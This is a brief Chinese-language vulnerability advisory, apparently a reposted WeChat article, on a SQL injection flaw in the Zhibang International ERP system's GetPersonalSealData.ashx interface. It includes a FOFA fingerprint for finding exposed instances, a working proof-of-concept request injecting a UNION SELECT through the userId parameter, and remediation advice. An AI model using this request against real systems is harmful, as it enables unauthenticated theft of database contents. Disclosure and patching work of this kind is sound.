一、漏洞简述
智邦国际ERP系统是一款综合性的企业资源计划系统,旨在帮助企业实现业务流程的自动化和优化。该系统包括了一系列的功能模块,如财务管理、采购管理、销售管理、库存管理、生产管理等,可以满足企业各方面的需求。其GetPersonalSealData.ashx接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用攻击者可以利用SQL注入漏洞获取数据库敏感信息。
二、网络测绘
fofa:icon_hash="-682445886"
三、漏洞复现
使用SQL注入测试获取数据库版本信息
四、漏洞检测poc
GET /SYSN/json/pcclient/GetPersonalSealData.ashx?imageDate=1&userId=-1%20union%20select%20@@version-- HTTP/1.1Host: 0.0.0.0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1
五、漏洞修复
1、建议联系厂商打补丁或升级版本。
2、增加Web应用防火墙防护。
3、关闭互联网暴露面或接口设置访问权限。
免责声明
原文始发于微信公众号(实战安全研究):漏洞复现 | 智邦国际ERP系统 GetPersonalSealData.ashx 存在SQL注入漏洞【附poc】
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论